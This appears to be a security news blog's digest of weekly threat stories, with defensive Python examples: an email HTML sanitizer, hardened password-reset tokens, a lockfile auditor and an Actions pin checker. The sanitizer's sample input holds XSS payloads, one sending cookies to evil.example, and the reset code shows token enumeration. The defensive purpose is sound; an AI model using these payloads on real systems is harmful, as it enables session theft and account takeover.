Posts

Perseus Android Malware Targets Your Notes App While CISA Sounds Alarms on Multiple Exploited Vulnerabilities

You know that feeling when you realize attackers have found a new angle you hadn’t considered? That’s exactly what happened this week with the discovery of Perseus, a new Android malware that’s doing something I haven’t seen before – it’s specifically targeting users’ note-taking apps to steal sensitive information.

While we’ve all gotten pretty good at warning people not to store passwords in plain text files, how many of us have explicitly told users not to jot down crypto wallet recovery phrases or banking details in their phone’s notes app? The Perseus malware is betting that not many of us have had that conversation, and honestly, they’re probably right.

Microsoft Intune Under Fire: Why CISA's Latest Warning Should Be Your Wake-Up Call

If you’ve been putting off that Intune security review, this week’s events might be the push you need. CISA just issued a stark warning to U.S. organizations about securing their Microsoft Intune deployments after cybercriminals used the endpoint management platform to completely wipe systems at medical technology giant Stryker.

This isn’t just another “patch your systems” advisory. When attackers can turn your own management tools against you, we’re looking at a fundamental shift in how we need to think about endpoint security.

Russian APTs Target Ukrainian Infrastructure While Critical Flaws Hit Enterprise Networks

It’s been one of those weeks where the threat landscape feels particularly active, and I wanted to walk through some developments that caught my attention. We’re seeing a concerning mix of nation-state activity and critical enterprise vulnerabilities that deserve our immediate focus.

Russian Groups Double Down on Zimbra Attacks

The most troubling news comes from Ukraine, where Russian APT groups are actively exploiting a Zimbra vulnerability to target critical infrastructure. According to SecurityWeek, this isn’t your typical phishing campaign - they’re leveraging insufficient CSS sanitization in HTML emails to execute inline scripts when messages are opened in browsers.
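The fix for this class of bug is an allowlist sanitizer that treats CSS as untrusted input, not a blocklist that hunts for known-bad strings. The following is an added example, not Zimbra's code or the patch for the flaw described above: it keeps a handful of safe tags, drops `<script>`/`<style>` together with their contents, rejects event-handler attributes and non-http(s)/mailto links, and only lets a `style` attribute through when every declaration uses an allowlisted property with a value free of parentheses, quotes, escapes and `@`-rules. The sample message is constructed for the demo.

```python
"""Allowlist sanitizer for HTML email bodies (added example, not Zimbra's code)."""
import re
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"a", "b", "i", "em", "strong", "p", "br", "div", "span",
                "ul", "ol", "li", "table", "tr", "td", "th"}
# Elements whose whole content is discarded, not just the tag itself.
DROP_WITH_CONTENT = {"script", "style", "svg", "object", "iframe", "noscript"}
ALLOWED_ATTRS = {"href", "style", "colspan", "rowspan"}
SAFE_URL_SCHEMES = ("http://", "https://", "mailto:")
# CSS: only these properties survive, and only with plain values.
ALLOWED_CSS_PROPS = {"color", "background-color", "font-weight", "font-style",
                     "text-align", "padding", "margin"}
# No parentheses (url(), expression()), no quotes, no slashes/backslashes, no '@'.
CSS_VALUE_RE = re.compile(r"^[a-zA-Z0-9#%\s.,-]+$")


def sanitize_css(style: str) -> str:
    """Return only allowlisted property:value pairs from an inline style."""
    kept = []
    for decl in style.split(";"):
        if ":" not in decl:
            continue
        prop, _, value = decl.partition(":")
        prop, value = prop.strip().lower(), value.strip()
        if prop in ALLOWED_CSS_PROPS and CSS_VALUE_RE.match(value):
            kept.append(f"{prop}: {value}")
    return "; ".join(kept)


class EmailSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.drop_depth = 0  # > 0 while inside a dropped element

    def handle_starttag(self, tag, attrs):
        if self.drop_depth:
            if tag in DROP_WITH_CONTENT:
                self.drop_depth += 1
            return
        if tag in DROP_WITH_CONTENT:
            self.drop_depth = 1
            return
        if tag not in ALLOWED_TAGS:
            return  # unknown tag dropped; its text content is still kept
        clean = []
        for name, value in attrs:
            name, value = name.lower(), value or ""
            if name.startswith("on") or name not in ALLOWED_ATTRS:
                continue
            if name == "href" and not value.strip().lower().startswith(SAFE_URL_SCHEMES):
                continue
            if name == "style":
                value = sanitize_css(value)
                if not value:
                    continue
            clean.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(clean)}>")

    def handle_endtag(self, tag):
        if self.drop_depth:
            if tag in DROP_WITH_CONTENT:
                self.drop_depth -= 1
            return
        if tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.drop_depth:
            self.out.append(escape(data))


def sanitize_email_html(html: str) -> str:
    parser = EmailSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)


# Constructed sample: inline style with url()/expression(), a <style> block,
# a javascript: link with an onclick handler, an inline script, one clean link.
SAMPLE = (
    '<p style="color:red; background:url(javascript:alert(1)); width:expression(alert(1))">Hi</p>'
    '<style>body{background:url(javascript:alert(1))}</style>'
    '<a href="javascript:alert(1)" onclick="steal()">click</a>'
    '<script>fetch("https://evil.example/?c="+document.cookie)</script>'
    '<a href="https://example.com">ok</a>'
)

if __name__ == "__main__":
    print(sanitize_email_html(SAMPLE))
```

Because the grammar of what is allowed is tiny and explicit, the sanitizer does not have to know every way CSS can smuggle a URL or an expression; anything outside the allowlist, including future tricks, is dropped by default.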

Password Resets Are the New Front Door for Attackers

I was reviewing some recent security incidents this week, and something caught my attention that I think we all need to talk about. While we’ve been busy hardening our primary authentication systems with MFA, zero trust, and all the latest security controls, attackers have quietly shifted their focus to a much softer target: password reset workflows.

It’s one of those “why didn’t I think of that” moments. We spend months implementing robust login security, then leave the back door wide open with poorly designed password reset processes. And the bad news? This trend is accelerating alongside some pretty serious developments in mobile security and AI-related incidents.
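To make the "back door" concrete, here is an added example (not drawn from any incident in the post) of the two shapes a reset flow tends to take. The weak version derives the token from data an attacker can guess, never expires it and never burns it after use; the hardened version issues a random 256-bit token from the OS CSPRNG, stores only its hash, expires it after 15 minutes, allows one live token per account, deletes it on first use and returns nothing that distinguishes a real account from an unknown one. The in-memory dict and the `accounts` set stand in for a database and are assumptions of the demo.

```python
"""Password-reset tokens: a weak pattern beside a hardened one (added example)."""
import hashlib
import secrets
from typing import Optional, Set

RESET_TTL_SECONDS = 15 * 60


# --- Weak pattern: the kind of thing attackers go looking for -----------------
def weak_issue_token(email: str, now: float) -> str:
    # Deterministic: anyone who knows the email and roughly when the request
    # was made can regenerate the token offline.
    return hashlib.md5(f"{email}{int(now)}".encode()).hexdigest()


def weak_verify(token: str, email: str, issued_at: float) -> bool:
    # No expiry, no single-use, and the token is valid forever once issued.
    return token == weak_issue_token(email, issued_at)


def weak_candidates(email: str, approx_time: float, window: int = 300) -> list:
    """What an attacker does with the weak scheme: knowing the victim's email and
    the request time to within a few minutes, enumerate every possible token."""
    return [weak_issue_token(email, approx_time + d) for d in range(-window, window + 1)]


# --- Hardened pattern ---------------------------------------------------------
class ResetService:
    def __init__(self, accounts: Set[str]):
        self.accounts = accounts      # hypothetical user table
        self.pending = {}             # sha256(token) -> {"email": ..., "expires": ...}

    @staticmethod
    def _hash(token: str) -> str:
        # Store only a hash so a leaked table does not hand out usable tokens.
        return hashlib.sha256(token.encode()).hexdigest()

    def request_reset(self, email: str, now: float) -> Optional[str]:
        """Return the raw token to be emailed, or None for unknown accounts.
        The HTTP response to the requester must be identical in both cases so
        the endpoint cannot be used to enumerate accounts."""
        if email not in self.accounts:
            return None
        # One live token per account: a new request invalidates the old one.
        self.pending = {h: rec for h, rec in self.pending.items() if rec["email"] != email}
        token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
        self.pending[self._hash(token)] = {"email": email, "expires": now + RESET_TTL_SECONDS}
        return token

    def consume(self, token: str, now: float) -> Optional[str]:
        """Return the email whose password may now be changed, or None.
        The token is removed on first use, valid or expired, so it cannot be replayed.
        Looking up by hash means an attacker cannot steer a timing side channel
        through the comparison of their guess against stored values."""
        rec = self.pending.pop(self._hash(token), None)
        if rec is None or now > rec["expires"]:
            return None
        return rec["email"]


if __name__ == "__main__":
    now = 1_700_000_000.0
    svc = ResetService({"alice@example.com"})
    tok = svc.request_reset("alice@example.com", now)
    print("hardened consume:", svc.consume(tok, now + 60))
    print("weak token guessable:",
          weak_issue_token("alice@example.com", now + 37) in weak_candidates("alice@example.com", now))
```

Two details matter as much as the randomness: the old token must die when a new one is issued (otherwise an attacker who triggered the first request still holds a valid one), and the lookup must delete the record even when the token turns out to be expired, so nothing lingers in the table.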

Chrome's Encryption Cracked by New Malware While Quantum-Safe Web Gets Closer

We’ve got some interesting developments this week that really highlight how the security game keeps evolving. A new piece of malware called VoidStealer has found a way around Chrome’s Application-Bound Encryption, the control that was supposed to stop infostealers from decrypting saved cookies and credentials from outside the browser, while on the flip side, we’re seeing real progress toward a quantum-safe web that could actually make things faster, not slower.

VoidStealer Breaks Chrome’s Master Key Protection

Here’s something that should grab your attention: VoidStealer malware has found a clever way around Chrome’s Application-Bound Encryption (ABE) using what they’re calling a “debugger trick.”

Major Botnet Takedown Shows Why IoT Security Can't Wait

This week brought some encouraging news that we don’t see nearly often enough: a successful international takedown of major botnet infrastructure. But as I dug into the details alongside other security developments, it became clear we’re dealing with the same fundamental problems that keep security teams up at night.

The Big Win: Four Botnets Down

The headline story comes from a joint operation between US, German, and Canadian authorities who successfully disrupted the command and control infrastructure powering four massive botnets: Aisuru, KimWolf, JackSkid, and Mossad. These weren’t small-time operations – they were described as among the world’s largest DDoS botnets, primarily targeting IoT devices.

When AI Meets Crime: $10M Streaming Fraud and the Week's Biggest Security Disruptions

You know that feeling when you realize criminals are getting more creative with technology than some of our legitimate use cases? This week delivered a perfect example with a North Carolina musician who just pleaded guilty to stealing over $10 million through an AI-powered streaming fraud scheme that’s honestly kind of brilliant – and terrifying.

Michael Smith figured out how to game Spotify, Apple Music, Amazon Music, and YouTube Music using AI bots to generate fake streams of his music. We’re talking about a sophisticated operation that flew under the radar long enough to net him eight figures. It’s a reminder that fraud detection systems, no matter how advanced, still struggle with well-orchestrated attacks that mimic legitimate user behavior at scale.

Supply Chain Attacks Are Getting Nastier: CanisterWorm Shows How Fast Things Can Spiral

I’ve been watching the security news this week, and honestly, it’s been a bit of a wake-up call. We’re seeing attackers get more creative and more persistent, especially when it comes to supply chain attacks. The most concerning story has to be the CanisterWorm incident that’s been spreading across npm packages like wildfire.

When One Attack Becomes Many

Here’s what happened: threat actors initially targeted Trivy, that popular container security scanner we’ve all probably used at some point. But instead of stopping there, they’ve managed to compromise 47 npm packages with something called CanisterWorm. The name comes from its use of canisters on the Internet Computer (ICP), smart contracts that can’t simply be taken down the way a rented C2 server can, which is what makes this thing so persistent.
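When dozens of packages turn at once, the question on every team is "did any of that land in our lockfile?" The script below is an added example, not tooling from the CanisterWorm or Trivy incidents: it reads a `package-lock.json` (lockfileVersion 2 or 3, where every installed package appears under `packages`), flags entries with no `integrity` hash, entries resolved from somewhere other than the public registry, entries that run install scripts, and lists which package versions changed between two lockfiles. The lockfiles, package names and URLs are constructed for the demo.

```python
"""Audit package-lock.json for supply-chain red flags (added example)."""
import json
from typing import Dict, List, Tuple

REGISTRY_PREFIX = "https://registry.npmjs.org/"


def _name_from_path(path: str) -> str:
    # "node_modules/a/node_modules/@scope/b" -> "@scope/b"
    return path.rsplit("node_modules/", 1)[-1]


def audit_lockfile(lock: dict) -> Dict[str, List[str]]:
    findings = {"no_integrity": [], "off_registry": [], "install_scripts": []}
    for path, meta in lock.get("packages", {}).items():
        if path == "" or meta.get("link"):
            continue  # root project entry or workspace symlink
        ref = f"{_name_from_path(path)}@{meta.get('version', '?')}"
        resolved = meta.get("resolved", "")
        if not meta.get("integrity"):
            findings["no_integrity"].append(ref)
        if resolved and not resolved.startswith(REGISTRY_PREFIX):
            findings["off_registry"].append(f"{ref} <- {resolved}")
        if meta.get("hasInstallScript"):
            # preinstall/install/postinstall run arbitrary code at `npm install`
            findings["install_scripts"].append(ref)
    return findings


def changed_packages(old: dict, new: dict) -> List[Tuple[str, str, str]]:
    """(name, old_version, new_version) for every entry that differs.
    A mass bump across unrelated packages in one commit is the pattern to watch."""
    old_v = {p: m.get("version") for p, m in old.get("packages", {}).items() if p}
    changes = []
    for path, meta in new.get("packages", {}).items():
        if path and old_v.get(path) != meta.get("version"):
            changes.append((_name_from_path(path), old_v.get(path), meta.get("version")))
    return sorted(changes)


# Constructed lockfiles; names, versions, hashes and hosts are made up.
OLD_LOCK = json.loads("""{
  "name": "demo", "lockfileVersion": 3,
  "packages": {
    "": {"name": "demo", "version": "1.0.0"},
    "node_modules/left-pad": {"version": "1.3.0",
      "resolved": "https://registry.npmjs.org/left-pad/-/left-pad-1.3.0.tgz",
      "integrity": "sha512-EXAMPLE1"},
    "node_modules/some-native": {"version": "2.0.0",
      "resolved": "https://registry.npmjs.org/some-native/-/some-native-2.0.0.tgz",
      "integrity": "sha512-EXAMPLE2", "hasInstallScript": true}
  }
}""")

NEW_LOCK = json.loads("""{
  "name": "demo", "lockfileVersion": 3,
  "packages": {
    "": {"name": "demo", "version": "1.0.0"},
    "node_modules/left-pad": {"version": "1.3.0",
      "resolved": "https://registry.npmjs.org/left-pad/-/left-pad-1.3.0.tgz",
      "integrity": "sha512-EXAMPLE1"},
    "node_modules/some-native": {"version": "2.1.0",
      "resolved": "https://registry.npmjs.org/some-native/-/some-native-2.1.0.tgz",
      "integrity": "sha512-EXAMPLE3", "hasInstallScript": true},
    "node_modules/evil-helper": {"version": "0.0.9",
      "resolved": "https://cdn.attacker.example/evil-helper-0.0.9.tgz",
      "hasInstallScript": true},
    "node_modules/pkg-from-git": {"version": "1.0.0",
      "resolved": "git+https://git.example/org/pkg.git#deadbeef",
      "integrity": "sha512-EXAMPLE4"}
  }
}""")

if __name__ == "__main__":
    print(json.dumps(audit_lockfile(NEW_LOCK), indent=2))
    print(changed_packages(OLD_LOCK, NEW_LOCK))
```

Run it in CI against the lockfile in the pull request and fail the build on any `off_registry` or `no_integrity` hit; `install_scripts` is a review prompt rather than a hard block, since many legitimate native modules need one, but a package that newly acquired an install script in a version bump deserves a look before it runs on a build machine.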

Oracle's Critical RCE Vulnerability and Android's New Security Features Dominate This Week's Security News

It’s been one of those weeks where the security community has been juggling multiple urgent issues – from a critical Oracle vulnerability that’s basically a hacker’s dream to some surprisingly positive developments in Android security. Let me walk you through what’s been keeping our incident response teams busy.

Oracle Drops a CVSS 9.8 Bomb

The biggest story this week is Oracle’s emergency patch for CVE-2026-21992, affecting their Identity Manager and Web Services Manager. When Oracle says a vulnerability is “remotely exploitable without authentication” and slaps a 9.8 CVSS score on it, you know someone’s day is about to get very complicated.

When Your Security Tools Become the Attack Vector: The Trivy Supply Chain Compromise and This Week's Security Reality Check

You know that sinking feeling when you realize the very tools you rely on to protect your infrastructure might be compromised? That’s exactly what happened this week with the Trivy vulnerability scanner breach, and it’s a stark reminder of how sophisticated supply chain attacks have become.

The Trivy Compromise: A Masterclass in Supply Chain Attacks

The Trivy vulnerability scanner breach is particularly unsettling because of how cleanly it was executed. TeamPCP, the threat actors behind this attack, didn’t just compromise some random repository – they went after one of our go-to security tools and managed to push credential-stealing malware through official releases and GitHub Actions.
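If malware can ship through official releases and GitHub Actions, then every workflow that pulls an action by a tag is trusting whoever can move that tag. The checker below is an added example, not part of Trivy or of the TeamPCP analysis: it scans a workflow file for `uses:` references and reports any that are not pinned to a full 40-character commit SHA, distinguishing floating refs (`@v4`, `@main`) from exact-but-still-mutable tags (`@v1.2.3`), and checks that the workflow declares top-level `permissions`. The workflow text, action names and SHA are constructed for the demo.

```python
"""Flag GitHub Actions `uses:` references that are not pinned to a commit SHA (added example)."""
import re
from typing import Dict, List

USES_RE = re.compile(r"^\s*-?\s*uses:\s*['\"]?([^'\"\s#]+)")
SHA_RE = re.compile(r"^[0-9a-f]{40}$")
EXACT_TAG_RE = re.compile(r"^v?\d+(\.\d+){2}$")


def check_action_pins(workflow_yaml: str) -> List[Dict]:
    """One finding per `uses:` line whose ref is not a full commit SHA."""
    findings = []
    for lineno, line in enumerate(workflow_yaml.splitlines(), 1):
        m = USES_RE.match(line)
        if not m:
            continue
        spec = m.group(1)
        if spec.startswith(("./", "docker://")):
            continue  # local action or container image: different trust model, out of scope here
        action, _, ref = spec.partition("@")
        if not ref:
            status = "unpinned"
        elif SHA_RE.match(ref):
            status = "sha"        # immutable: the only form that survives a tag being moved
        elif EXACT_TAG_RE.match(ref):
            status = "tag"        # exact release tag, but tags can be force-pushed
        else:
            status = "floating"   # major tag or branch: re-resolved on every run
        if status != "sha":
            findings.append({"line": lineno, "action": action, "ref": ref or None, "status": status})
    return findings


def has_top_level_permissions(workflow_yaml: str) -> bool:
    """Without a top-level `permissions:` block the GITHUB_TOKEN gets the repo default."""
    return re.search(r"^permissions:", workflow_yaml, re.MULTILINE) is not None


# Constructed workflow; the 40-hex value is a placeholder, not a real commit.
SAMPLE_WORKFLOW = """\
name: ci
on: [push]
permissions:
  contents: read
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-go@0123456789abcdef0123456789abcdef01234567  # constructed SHA
      - uses: someorg/scan-action@main
      - uses: someorg/release-action@v1.2.3
      - uses: ./.github/actions/local
      - uses: docker://alpine:3.19
"""

if __name__ == "__main__":
    for f in check_action_pins(SAMPLE_WORKFLOW):
        print(f"line {f['line']}: {f['action']}@{f['ref']} is {f['status']}")
    print("top-level permissions:", has_top_level_permissions(SAMPLE_WORKFLOW))
```

Pinning to a SHA does not make a compromised action safe, but it means a release hijack cannot reach you until a human bumps the pin, which is exactly the review gate you want when one of your own security tools turns out to be the delivery vehicle.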